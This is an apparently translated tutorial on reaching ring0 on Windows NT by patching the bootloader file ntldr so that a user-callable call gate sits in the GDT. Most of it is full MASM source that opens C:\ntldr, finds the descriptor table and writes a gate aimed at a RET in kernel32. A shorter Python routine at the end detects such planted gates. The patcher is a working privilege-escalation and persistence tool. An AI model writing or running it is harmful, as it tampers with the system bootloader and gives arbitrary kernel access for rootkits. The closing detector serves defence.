Let the program enter ring0 level for execution

Source: Internet
Author: User

In protected mode, ring0 has the highest privilege and has long been the target of many hackers' programs. On the NT platform, Microsoft protects the system tables, so they cannot be modified directly the way they can on Win9x. There are still many ways to reach ring0, though. In China, the earliest was sinister's method of writing a driver to enter ring0, which is also the most common; webcrazy's method reads and writes physical memory to reach the physical pages holding the GDT and plants its own call gate there, giving free access to ring0. Later, MgF proposed a newer method, which is the one I want to introduce here: modifying ntldr.

Why modify ntldr? When Windows starts, the descriptors in the GDT have to be loaded, and the NT boot loader is ntldr, so the descriptors may well be stored inside ntldr; if that assumption holds, we should be able to find the system descriptors in ntldr. Let's try an experiment: open ntldr with ue and search for the hexadecimal bytes FFFF 0000 009a cf00 (this is a descriptor from the GDT; its selector is 08h). The search hits, which shows the idea is right, and looking around the hit there are many more descriptors. So if we add our own call gate and our own system descriptor in the empty area of the descriptor region we found, then when the system restarts our call gate is loaded into memory by the operating system, and we have the call gate we need; through it we can enter ring0 freely. Some may ask why the system descriptor with selector 08h is not used directly, and why a new selector and descriptor are generated instead. The reason is that the code a call gate points to is generally in the user area, and MS checks for this: if code running under selector 08h is below 0x80000000, it is treated as illegal access to ring0 and an exception is raised. See the code below, which modifies ntldr to add a call gate and can then run arbitrary ring0 code.

.386
.model flat, stdcall
option casemap:none
include D:\masm32\include\windows.inc
include D:\masm32\include\kernel32.inc
include D:\masm32\include\user32.inc
includelib D:\masm32\lib\kernel32.lib
includelib D:\masm32\lib\user32.lib

.data
szfilename  db 'C:\ntldr', 0
dwattrib    dd 0
hfile       dd 0
hmap        dd 0
pfile       dd 0
dwfilesize  dd 0
dwc3code    dd 0
gdtflag     dw 0ffffh, 0000h, 9a00h, 00cfh   ; the first two descriptors in the GDT
            dw 0ffffh, 0000h, 9200h, 00cfh
callgate    dw 0, 0108h, 0ec00h, 0           ; the call gate, followed by ...
            dw 0ffffh, 0000h, 9a00h, 00cfh   ; ... a system (ring0 code) descriptor
callsel     dd 0                             ; far pointer: the selector of the call gate
            dw 103h

.code
start:
    push offset szfilename
    call GetFileAttributes          ; get the file attributes
    mov edx, eax
    inc edx
    je error_getfileattrib          ; exit if an error was returned
    mov dwattrib, eax               ; otherwise save the file attributes
    push 80h
    push offset szfilename
    call SetFileAttributes          ; make it a normal file
    call findc3code                 ; find a RET instruction in kernel32.dll
    push 0
    push 80h
    push 3
    push 0
    push 3
    push 0c0000000h
    push offset szfilename
    call CreateFileA                ; open the file
    mov edx, eax
    inc edx
    je error_openfile
    mov hfile, eax
    push 0
    push hfile
    call GetFileSize
    mov dwfilesize, eax             ; get the file size
    push 0
    push 0
    push 0
    push 4
    push 0
    push hfile
    call CreateFileMapping
    or eax, eax
    je error_filemap
    mov hmap, eax
    push 0
    push 0
    push 0
    push 6
    push eax
    call MapViewOfFile              ; map the file into memory
    or eax, eax
    je error_map
    mov pfile, eax
    mov edi, eax
    mov esi, offset gdtflag
    mov ecx, dwfilesize
@@:                                 ; search ntldr for the descriptors
    inc edi
    push esi
    push edi
    push ecx
    mov ecx, 10h
    repz cmpsb
    pop ecx
    pop edi
    pop esi
    loopnz @B
    or ecx, ecx
    je error_map
    xor eax, eax                    ; flag found: look for free space in the GDT for the call gate
    mov ecx, 80h
@@:
    sub edi, 8
    push edi
    push ecx
    mov ecx, 8
    repz scasb                      ; confirm the position
    pop ecx
    pop edi
    loopnz @B
    or ecx, ecx
    je error_map
    add edi, 100h
    lea esi, callgate
    mov ecx, 10h
    rep movsb                       ; write the call gate
    mov edx, dwc3code
    mov word ptr [edi-16], dx
    shr edx, 16
    mov word ptr [edi-10], dx
error_map:
    push pfile
    call UnmapViewOfFile
error_filemap:
    push hmap
    call CloseHandle
error_openfile:
    push hfile
    call CloseHandle
    push dwattrib
    push offset szfilename
    call SetFileAttributes          ; restore the file attributes
error_getfileattrib:
    push 0
    call ExitProcess

findc3code:
    assume fs:nothing
    mov eax, fs:[30h]
    mov eax, [eax+0ch]
    mov esi, [eax+1ch]
    lodsd
    mov eax, [eax+08h]              ; eax -> kernel32 base address
    mov edi, eax
    add edi, 1000h                  ; search from the code section
    mov ecx, 20000h
    mov al, 0c3h                    ; look for a RET instruction
    repnz scasb
    dec edi
    mov dwc3code, edi
    ret
end start

This program modifies ntldr and writes one call gate of its own plus one system descriptor at offset 100h from the first descriptor of the GDT. After a restart, our call gate is loaded into the GDT, so we can enter ring0 freely. Note that the call gate in this program points at a RET instruction in kernel32.dll. Why? First, look at what the CPU does when a call gate is used: when a program goes through a call gate, the CPU saves all the registers, including eax, ebx, ecx, edx, esp, cs, ds, es, fs, ss, eip, and so on. After the switch through the call gate, the stack looks like this:

eip
ring3 esp
....

As you can see, if a RET instruction is executed here, we jump to the instruction following the call through the gate, and so switch back to our own program.
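As an added, defender-side example (not code from the article): a Python check that locates the GDT image embedded in a loader file by the article's own descriptor bytes, decodes each entry, and reports any call gate, which is the artifact the technique above leaves behind. The sample image and the gate target address 0x77E51234 are constructed for the test, not taken from a real ntldr.

```python
import struct

# Bytes of "dw 0ffffh, 0000, 9a00h, 00cfh": the flat ring0 code descriptor
# (selector 08h) that the article uses as its search key inside ntldr.
FLAT_CODE_DESC = bytes.fromhex("ffff0000009acf00")

def decode_descriptor(raw):
    """Decode one 8-byte GDT entry; call gates (S=0, type 4/0Ch) have their own layout."""
    access = raw[5]
    present, dpl, s_bit, typ = bool(access & 0x80), (access >> 5) & 3, bool(access & 0x10), access & 0xF
    if not s_bit and typ in (0x4, 0xC):
        return {"kind": "call_gate", "present": present, "dpl": dpl,
                "selector": raw[2] | raw[3] << 8,
                "offset": raw[0] | raw[1] << 8 | raw[6] << 16 | raw[7] << 24}
    return {"kind": "system" if not s_bit else ("code" if typ & 8 else "data"),
            "present": present, "dpl": dpl, "type": typ,
            "base": raw[2] | raw[3] << 8 | raw[4] << 16 | raw[7] << 24,
            "limit": raw[0] | raw[1] << 8 | (raw[6] & 0xF) << 16}

def find_gdt_image(blob):
    """Offset of the embedded GDT (null descriptor followed by the flat code one), or -1."""
    return blob.find(bytes(8) + FLAT_CODE_DESC)

def suspicious_gates(blob, max_entries=0x80):
    """List every present call gate in the table with its DPL and target;
    a DPL 3 gate aiming below 0x80000000 is exactly what the article plants."""
    base, hits = find_gdt_image(blob), []
    for idx in range(max_entries if base >= 0 else 0):
        raw = blob[base + idx * 8:base + idx * 8 + 8]
        if len(raw) < 8:
            break
        d = decode_descriptor(raw) if raw != bytes(8) else {"kind": "null"}
        if d["kind"] == "call_gate" and d["present"]:
            hits.append({"selector": idx * 8, "dpl": d["dpl"],
                         "target_selector": d["selector"], "target_offset": d["offset"],
                         "user_space_target": d["offset"] < 0x80000000})
    return hits

def build_sample_image():
    """Constructed test image, not a real ntldr: null + flat code descriptor, zero padding,
    then at table offset 100h the 16 bytes the article writes; 0x77E51234 is a made-up target."""
    gdt = bytearray(0x200)
    gdt[8:16] = FLAT_CODE_DESC
    gdt[0x100:0x108] = struct.pack("<HHBBH", 0x1234, 0x0108, 0, 0xEC, 0x77E5)
    gdt[0x108:0x110] = FLAT_CODE_DESC
    return b"\x90" * 64 + bytes(gdt) + bytes(32)
```

Running suspicious_gates over a file image returns an empty list when no call gate is present, so it can be used as a simple integrity check on a copy of the loader.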
